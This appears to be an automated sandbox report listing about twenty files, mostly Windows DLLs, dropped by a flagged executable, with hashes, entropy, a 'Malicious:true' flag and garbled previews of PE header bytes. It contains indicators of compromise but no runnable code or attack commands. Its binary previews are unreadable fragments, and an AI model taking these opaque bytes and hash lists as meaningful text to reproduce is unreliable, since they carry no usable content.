                                                                                                                                                                                                                              SHA-256:91D0D471C50CFCC9FD8688AE2350477408BB987E67A1C5F508D17C5DD021314F
                                                                                                                                                                                                                              SHA-512:091B3FE2F4F4FA6FCAE8F920D9F97089CDB9DB8E57980588198873D07E12C994CBC860B02597BD128862E475AE0C54A283D6DBC194F1F2D3978BA77F7D39965B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.}..s...s...s.......s.......s.......s.......s.......s.......s..J....s...s..ms.......s.......s.......s.......s..Rich.s..................PE..d...OJ.f.........." ...(..... ...............................................@............`.........................................@...h............ ..........|/...........0.......`..............................._..@...............`............................text............................... ..`.rdata.............................@..@.data....>.......:..................@....pdata..|/.......0..................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):24064
                                                                                                                                                                                                                              Entropy (8bit):5.671576218459356
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:Bl6YwU58iEr4Pp/zosXH1UXAN+I6kIbHOKZHMxgaUJ:Bl6Yp8jrszoE1UXvTHOCHM6a
                                                                                                                                                                                                                              MD5:D80E23C523BEA5ACA6EC702EF6DCBF8D
                                                                                                                                                                                                                              SHA1:A363362E722B68AAEA9BA30965AF18AAB505BFE1
                                                                                                                                                                                                                              SHA-256:C480EDC4EBD5757B92F543B0589AF0C6FEBF1153992B948322B7E69F2A0EAF61
                                                                                                                                                                                                                              SHA-512:D1381B1B929DCDBDFF8AEF1D09E05E7DF8F31E8A6C2CB89015B343FE963CA04AFB448E84436C4A04A5EF704FAADBF290AD1780D28F940FAE11D06359F66553F6
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........B...B...B...K...F....t..@.......@....t..A....t..J....t..N...Qs..A...B...m...Qs..C...Qs..C...Qso.C...Qs..C...RichB...........PE..d...PJ.f.........." ...(.6...*......@9....................................................`.........................................@`..h....`..x...............8...............@....U...............................S..@............P..`............................text...(5.......6.................. ..`.rdata.......P.......:..............@..@.data...P....p.......P..............@....pdata..8............R..............@..@.rsrc................Z..............@..@.reloc..@............\..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14848
                                                                                                                                                                                                                              Entropy (8bit):5.083733997082165
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:sGrzuJtIEepKl1Cxmnyx1ttkobpsE0BDAXR09IckgTd2T:puJgp6Dy7XDbpsEiAXG9GgTd2
                                                                                                                                                                                                                              MD5:6469B7315A33774D1C7EF7459058F889
                                                                                                                                                                                                                              SHA1:FF37C958770C2BA3897D168A4AFBFFAD93E5E3BA
                                                                                                                                                                                                                              SHA-256:317E4219DE122F058C86F858F11B9510B6D196FD8027DD35352E7784E6968500
                                                                                                                                                                                                                              SHA-512:F56EA8983DA251908F7830A42EA57FEE1C6CD18EF00238693E108A9E58A560690769F69BBD639D2E5F239051012ACC17BC556CF3F5A09962B51ACE476FF471A2
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.mm.mm.mm...m.mm.9ll.mm.9nl.mm.9il.mm.9hl.mm.>ll.mm..ll.mm.lm.mm.>el.mm.>ml.mm.>.m.mm.>ol.mmRich.mm................PE..d...PJ.f.........." ...(.....$......@.....................................................`..........................................;..d...$<.......p.......`..................<...`5.............................. 4..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data...X....P.......0..............@....pdata.......`.......2..............@..@.rsrc........p.......6..............@..@.reloc..<............8..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):412160
                                                                                                                                                                                                                              Entropy (8bit):6.5323629884961605
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:Tt4e4UJ0STq5yCQCGNmwNby50erYs2uhCKeg09wd:TtZT6SGwCrxsOrYQe
                                                                                                                                                                                                                              MD5:C09A7A8EA25DDC38DC498806EAAAE8E4
                                                                                                                                                                                                                              SHA1:9E96616D04B6E02EB5018A63A35069ED8C1FFF98
                                                                                                                                                                                                                              SHA-256:78896672E2CD8346717F06EFED551347B3158DC10AAEC2FC61071C1791C06437
                                                                                                                                                                                                                              SHA-512:2AD92553AFB5C40844AC66466E043750D8FC5E324B8700D518068F638C0AE7B9C963CA9D22F91FD5A462C6718FF742E3CFD2BF7E3658437C73935719AA8FEEB2
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|.k...k...k.......k..]....k.......k..]....k..]....k..]....k.......k...k...k.......k.......k.......k.....k.......k..Rich.k..........................PE..d...OJ.f.........." ...(.....\............................................................`.........................................0...\....................`...<..................p...............................0...@............0...............................text...(........................... ..`.rdata.......0......................@..@.data....2... ......................@....pdata...<...`...>..................@..@.rsrc................F..............@..@.reloc...............H..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):119192
                                                                                                                                                                                                                              Entropy (8bit):6.6016214745004635
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:+qvQ1Dj2DkX7OcujarvmdlYNABCmgrP4ddbkZIecbWcFML/UXzlghzdMFw84hzk:+qvQ1D2CreiABCmgYecbWVLUD6h+b4ho
                                                                                                                                                                                                                              MD5:BE8DBE2DC77EBE7F88F910C61AEC691A
                                                                                                                                                                                                                              SHA1:A19F08BB2B1C1DE5BB61DAF9F2304531321E0E40
                                                                                                                                                                                                                              SHA-256:4D292623516F65C80482081E62D5DADB759DC16E851DE5DB24C3CBB57B87DB83
                                                                                                                                                                                                                              SHA-512:0DA644472B374F1DA449A06623983D0477405B5229E386ACCADB154B43B8B083EE89F07C3F04D2C0C7501EAD99AD95AECAA5873FF34C5EEB833285B598D5A655
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.../c../c../c._]b./c..W.../c../b./c../c../c...`./c...g./c...f./c...c./c....../c...a./c.Rich./c.........................PE..d.....cW.........." ...&. ...d......................................................-.....`A.........................................e..4...4m...........................O...........N..p............................L..@............0...............................text...&........................... ..`fothk........ ...................... ..`.rdata..\C...0...D...$..............@..@.data...p............h..............@....pdata...............l..............@..@_RDATA...............x..............@..@.rsrc................z..............@..@.reloc...............~..............@..B................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):49528
                                                                                                                                                                                                                              Entropy (8bit):6.662491747506177
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:wPIyGVrxmKqOnA4j3z6Su77A+i0QLxi9z9Rtii9zn+:fBr87uW1nA8QLx+zrti+zn+
                                                                                                                                                                                                                              MD5:F8DFA78045620CF8A732E67D1B1EB53D
                                                                                                                                                                                                                              SHA1:FF9A604D8C99405BFDBBF4295825D3FCBC792704
                                                                                                                                                                                                                              SHA-256:A113F192195F245F17389E6ECBED8005990BCB2476DDAD33F7C4C6C86327AFE5
                                                                                                                                                                                                                              SHA-512:BA7F8B7AB0DEB7A7113124C28092B543E216CA08D1CF158D9F40A326FB69F4A2511A41A59EA8482A10C9EC4EC8AC69B70DFE9CA65E525097D93B819D498DA371
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9@.W}!..}!..}!...S...!..{....!..tYJ.v!..}!..N!..{...x!..{...z!..{...f!..{...|!..{.&.|!..{...|!..Rich}!..................PE..d.....v..........." ...&.<...8.......B...................................................`A........................................Pm.......m..x....................r..xO......D....c..p...........................`b..@............P..`............................text...p:.......<.................. ..`.rdata...#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):71448
                                                                                                                                                                                                                              Entropy (8bit):6.263206909105092
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:BoxWhy9EQkTpR1Pg9qgTILN/86wW1lI1Onl7SyPxN3:BiWhy3k1Ra9qgTILN/Lw8lI1OnlB
                                                                                                                                                                                                                              MD5:CC0F232F2A8A359DEE29A573667E6D77
                                                                                                                                                                                                                              SHA1:D3FFBF5606D9C77A0DE0B7456F7A5314F420B1F7
                                                                                                                                                                                                                              SHA-256:7A5C88CE496BAFDF31A94AE6D70B017070703BC0A7DA1DFAE7C12B21BB61030D
                                                                                                                                                                                                                              SHA-512:48484177BF55179607D66F5A5837A35CD586E8A9FB185DE8B10865AAB650B056A61D1DC96370C5EFC6955CCB4E34B31810F8E1C8F5F02D268F565A73B4FF5657
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7_[.V1..V1..V1......V1.5.0..V1.5.2..V1.5.5..V1.5.4..V1...0..V1...0..V1..V0.qV1...<..V1...1..V1......V1...3..V1.Rich.V1.........................PE..d.....f.........." ...(.f................................................... ............`.............................................P......d......................../..............T...........................@...@............................................text...]e.......f.................. ..`.rdata..pO.......P...j..............@..@.data...p...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):85272
                                                                                                                                                                                                                              Entropy (8bit):6.591457260071925
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:+yhz79151BVo1vXfzIFnaR4bO1AsCn8Bsjk+tI1CVQ7Sy4x+R:Nhzx15evXkuxAB8BMk+tI1CVQF
                                                                                                                                                                                                                              MD5:DD26ED92888DE9C57660A7AD631BB916
                                                                                                                                                                                                                              SHA1:77D479D44D9E04F0A1355569332233459B69A154
                                                                                                                                                                                                                              SHA-256:324268786921EC940CBD4B5E2F71DAFD08E578A12E373A715658527E5B211697
                                                                                                                                                                                                                              SHA-512:D693367565005C1B87823E781DC5925146512182C8D8A3A2201E712C88DF1C0E66E65ECAEC9AF22037F0A8F8B3FB3F511EA47CFD5774651D71673FAB612D2897
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................b....(......(......(......(......(.....................................................Rich...........PE..d......f.........." ...(.....^...............................................`............`.........................................p...H............@.......0..D......../...P..........T...........................p...@............................................text...#........................... ..`.rdata..P>.......@..................@..@.data........ ......................@....pdata..D....0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):125208
                                                                                                                                                                                                                              Entropy (8bit):6.138116508461042
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:cXw32spTVYgFoj6N2xE9sb7VRf/EiZBq5syCtYPU9BI1LP885:cgGEOgFoj68ksrf/Ejsa5
                                                                                                                                                                                                                              MD5:C8AFA1EBB28828E1115C110313D2A810
                                                                                                                                                                                                                              SHA1:1D0D28799A5DBE313B6F4DDFDB7986D2902FA97A
                                                                                                                                                                                                                              SHA-256:8978972CF341CCD0EDF8435D63909A739DF7EF29EC7DD57ED5CAB64B342891F0
                                                                                                                                                                                                                              SHA-512:4D9F41BD23B62600D1EB097D1578BA656B5E13FD2F31EF74202AA511111969BB8CFC2A8E903DE73BD6E63FADAA59B078714885B8C5B8ECC5C4128FF9D06C1E56
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......f.d."..."..."...+...$....... .......&.......*...........7... ...i...#...i...$.......!..."......7...$...7...#...7...#...7...#...Rich"...........................PE..d....f.........." ...(............`_..............................................|.....`.........................................p`.......`.........................../......t.......T...............................@............................................text............................... ..`.rdata..hl.......n..................@..@.data...,5.......0...j..............@....pdata..............................@..@.rsrc...............................@..@.reloc..t...........................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):257304
                                                                                                                                                                                                                              Entropy (8bit):6.565090204799859
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:3uQjqbJrTwvqM+eYx+lDJOAkl9qWM53pLW1AcfRRR6tlISgOg:3sTwvWeS+xJw4ln7g
                                                                                                                                                                                                                              MD5:CEA3B419C7CA87140A157629C6DBD299
                                                                                                                                                                                                                              SHA1:7DBFF775235B1937B150AE70302B3208833DC9BE
                                                                                                                                                                                                                              SHA-256:95B9850E6FB335B235589DD1348E007507C6B28E332C9ABB111F2A0035C358E5
                                                                                                                                                                                                                              SHA-512:6E3A6781C0F05BB5182073CCA1E69B6DF55F05FF7CDCEA394BACF50F88605E2241B7387F1D8BA9F40A96832D04F55EDB80003F0CF1E537A26F99408EE9312F5B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........V..............'.....g&......g&......g&......g&.......!.................9....!.......!.......!.......!K......!......Rich............PE..d.....f.........." ...(.....<............................................................`..........................................c..P....c...................&......./......T.......T...........................p...@............................................text...9........................... ..`.rdata..(...........................@..@.data...X*.......$...b..............@....pdata...&.......(..................@..@.rsrc...............................@..@.reloc..T...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):66328
                                                                                                                                                                                                                              Entropy (8bit):6.227566291152438
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:/9gLpgE4Z27ARZWZnEmoAlI1OIH7SyT0xq:26RZeEmoAlI1OIHth
                                                                                                                                                                                                                              MD5:D19CB5CA144AE1FD29B6395B0225CF40
                                                                                                                                                                                                                              SHA1:5B9EC6E656261CE179DFCFD5C6A3CFE07C2DFEB4
                                                                                                                                                                                                                              SHA-256:F95EC2562A3C70FB1A6E44D72F4223CE3C7A0F0038159D09DCE629F59591D5AA
                                                                                                                                                                                                                              SHA-512:9AC3A8A4DBDB09BE3760E7CCB11269F82A47B24C03D10D289BCDDED9A43E57D3CD656F8D060D66B810382ECAC3A62F101F83EA626B58CD0B5A3CCA25B67B1519
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........N@.. ... ... ...... ..k!... ..k#... ..k$... ..k%... ..l!... ...!... ..h!... ...!.Y. ..l-... ..l ... ..l.... ..l"... .Rich.. .........................PE..d......f.........." ...(.V.......... @............................................../.....`.........................................p...P................................/......X...@}..T............................|..@............p..(............................text....T.......V.................. ..`.rdata...O...p...P...Z..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):160024
                                                                                                                                                                                                                              Entropy (8bit):6.85368707809341
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:lsvkxujgo7e2uONOG+hi+C8znfF9mNooXnmbutI1Z1mb:lnu0o7JUrNYOo2Kz
                                                                                                                                                                                                                              MD5:8CFBAFE65D6E38DDE8E2E8006B66BB3E
                                                                                                                                                                                                                              SHA1:CB63ADDD102E47C777D55753C00C29C547E2243C
                                                                                                                                                                                                                              SHA-256:6D548DB0AB73291F82CF0F4CA9EC0C81460185319C8965E829FAEACAE19444FF
                                                                                                                                                                                                                              SHA-512:FA021615D5C080AADCD5B84FD221900054EB763A7AF8638F70CF6CD49BD92773074F1AC6884F3CE1D8A15D59439F554381377FAEE4842ED5BEB13FF3E1B510F4
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D.3H%.`H%.`H%.`A]7`L%.`...aJ%.`...aK%.`...a@%.`...aD%.`]..aK%.`.].aJ%.`H%.`-%.`]..ar%.`]..aI%.`].[`I%.`]..aI%.`RichH%.`........................PE..d......f.........." ...(.f..........`8....................................................`......................................... %..L...l%..x....p.......P.......B.../......4.......T...............................@............................................text...be.......f.................. ..`.rdata..............j..............@..@.data...p....@......................@....pdata.......P......."..............@..@.rsrc........p.......6..............@..@.reloc..4............@..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):35608
                                                                                                                                                                                                                              Entropy (8bit):6.432025225087344
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:a1Rp7eiajKCWnAxQ0zduVI1Wt95YiSyvAAMxkE3:mRteiaoAxQ0zIVI1Wtj7SyGxr
                                                                                                                                                                                                                              MD5:EB859FC7F54CBA118A321440AD088096
                                                                                                                                                                                                                              SHA1:9D3C410240F4C5269E07FFBDE43D6F5E7CC30B44
                                                                                                                                                                                                                              SHA-256:14BDD15D60B9D6141009AEEDC606007C42B46C779A523D21758E57CF126DC2A4
                                                                                                                                                                                                                              SHA-512:694A9C1CC3DC78B47FAEDF66248FF078E5090CFAB22E95C123FB99B10192A5748748A5F0937FFD9FD8E1873AD48F290BE723FE194B7EB2A731ADD7F5FB776C4A
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......T.A)../z../z../z..z../z.$.{../z.$,{../z.$+{../z.$*{../z.#.{../z...zr./z[..{../z.#"{../z.#/{../z.#.z../z.#-{../zRich../z........PE..d.....f.........." ...(. ...>......@................................................J....`.........................................@E..`....E..x............p.......\.../...........4..T............................3..@............0...............................text............ .................. ..`.rdata... ...0..."...$..............@..@.data...`....`.......F..............@....pdata.......p.......L..............@..@.rsrc................P..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):56088
                                                                                                                                                                                                                              Entropy (8bit):6.331247108655531
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:Minr44gaZPXxCJ/+yZdDDr5I1Xtw7Sy+xmS2:M3J/+yZdDDr5I1Xtwf
                                                                                                                                                                                                                              MD5:DF92EA698A3D0729B70A4306BBE3029F
                                                                                                                                                                                                                              SHA1:B82F3A43568148C64A46E2774AEC39BF1F2D3C1E
                                                                                                                                                                                                                              SHA-256:46DEC978EC8CB2146854739BFEDDEA93335DCC92A25D719352B94F9517855032
                                                                                                                                                                                                                              SHA-512:BDEBAFE1B40244A0CB6C97E75424F79CFE395774A9D03CDB02F82083110C1F4BDCAC2819BA1845AD1C56E2D2E6506DCC1833E4EB269BB0F620F0EB73B4D47817
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a.{X..(X..(X..(QxT(\..(...)Z..(...)[..(...)P..(...)T..(M..)Z..(X..(/..(.x.)]..(.x.)Y..(M..)Y..(M..)Y..(M.8(Y..(M..)Y..(RichX..(........PE..d.....f.........." ...(.N...`.......................................................M....`.............................................X.............................../......(....f..T............................e..@............`...............................text...7L.......N.................. ..`.rdata...8...`...:...R..............@..@.data...0...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..(...........................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):32536
                                                                                                                                                                                                                              Entropy (8bit):6.552970921547832
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:1lzRmezd6rGjMoW4BI1QUGL5YiSyv8+WAMxkEW7:LRm0MGooW4BI1QUG17SyIxC7
                                                                                                                                                                                                                              MD5:7D91DD8E5F1DBC3058EA399F5F31C1E6
                                                                                                                                                                                                                              SHA1:B983653B9F2DF66E721ECE95F086C2F933D303FC
                                                                                                                                                                                                                              SHA-256:76BBA42B1392DC57A867AEF385B990FA302A4F1DCF453705AC119C9C98A36E8D
                                                                                                                                                                                                                              SHA-512:B8E7369DA79255A4BB2ED91BA0C313B4578EE45C94E6BC74582FC14F8B2984ED8FCDA0434A5BD3B72EA704E6E8FD8CBF1901F325E774475E4F28961483D6C7CF
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7.\.V...V...V...."..V..5...V..5...V..5...V..5...V......V.......V...V...V......V......V....N..V......V..Rich.V..........................PE..d.....f.........." ...(.....8.......................................................x....`..........................................C..L...<D..d....p.......`.......P.../...........4..T...........................@3..@............0..8............................text............................... ..`.rdata.......0......................@..@.data........P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):83736
                                                                                                                                                                                                                              Entropy (8bit):6.31969940395018
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:1536:COYhekrkJqlerLSyypHi9/s+S+pzjii/n1IsJqKNBI1Lw9PD7Sy9duxJ:jwkJqHyypHi9/sT+pzjiE1IwdNBI1LwU
                                                                                                                                                                                                                              MD5:E43AED7D6A8BCD9DDFC59C2D1A2C4B02
                                                                                                                                                                                                                              SHA1:36F367F68FB9868412246725B604B27B5019D747
                                                                                                                                                                                                                              SHA-256:2C2A6A6BA360E38F0C2B5A53B4626F833A3111844D95615EBF35BE0E76B1EF7A
                                                                                                                                                                                                                              SHA-512:D92E26EB88DB891DE389A464F850A8DA0A39AF8A4D86D9894768CB97182B8351817CE14FE1EB8301B18B80D1D5D8876A48BA66EB7B874C7C3D7B009FCDBC8C4E
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../...Nb}.Nb}.Nb}.6.}.Nb}g.c|.Nb}g.a|.Nb}g.f|.Nb}g.g|.Nb}..c|.Nb}.Nc}.Nb}.6c|.Nb}..o|.Nb}..b|.Nb}..}.Nb}..`|.Nb}Rich.Nb}................PE..d......f.........." ...(.x..........0-.......................................`......@.....`.........................................@...P............@.......0.........../...P......P...T...............................@............................................text....v.......x.................. ..`.rdata...x.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):178456
                                                                                                                                                                                                                              Entropy (8bit):5.974570300962832
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:ZmkiCZfBmvD1ZLnM2Yfp6XSVJLX2GvMf1ba+VRJNI7IM/H9o/PCrXuI3JtI1C7lD:xiC5QD1dwp6XSxMfjTwJxd
                                                                                                                                                                                                                              MD5:6A2B0F8F50B47D05F96DEFF7883C1270
                                                                                                                                                                                                                              SHA1:2B1AEB6FE9A12E0D527B042512FC8890EEDB10D8
                                                                                                                                                                                                                              SHA-256:68DAD60FF6FB36C88EF1C47D1855517BFE8DE0F5DDEA0F630B65B622A645D53A
                                                                                                                                                                                                                              SHA-512:A080190D4E7E1ABB186776AE6E83DAB4B21A77093A88FCA59CE1F63C683F549A28D094818A0EE44186DDEA2095111F1879008C0D631FC4A8D69DD596EF76CA37
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........^..`...`...`......`./ia...`./ic...`./id...`./ie...`..na...`..ja...`...a.u.`...a...`..nm...`..n`...`..n....`..nb...`.Rich..`.........PE..d......f.........." ...(.............,....................................................`.............................................d...D...................P......../......x.......T...........................@...@............................................text............................... ..`.rdata...#.......$..................@..@.data...p...........................@....pdata..P............b..............@..@.rsrc................n..............@..@.reloc..x............x..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21523
                                                                                                                                                                                                                              Entropy (8bit):4.827830596623684
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:UqT9XC9VZv9QXCTxsCTHI7672ORgS0mzBvxFRTX7Xvt3wBTnFXhCUvuyqz:LT9XC9VZviXCVsCLI7JlmzBvTxvt3gTW
                                                                                                                                                                                                                              MD5:08EDF746B4A088CB4185C165177BD604
                                                                                                                                                                                                                              SHA1:395CDA114F23E513EEF4618DA39BB86D034124BF
                                                                                                                                                                                                                              SHA-256:517204EE436D08EFC287ABC97433C3BFFCAF42EC6592A3009B9FD3B985AD772C
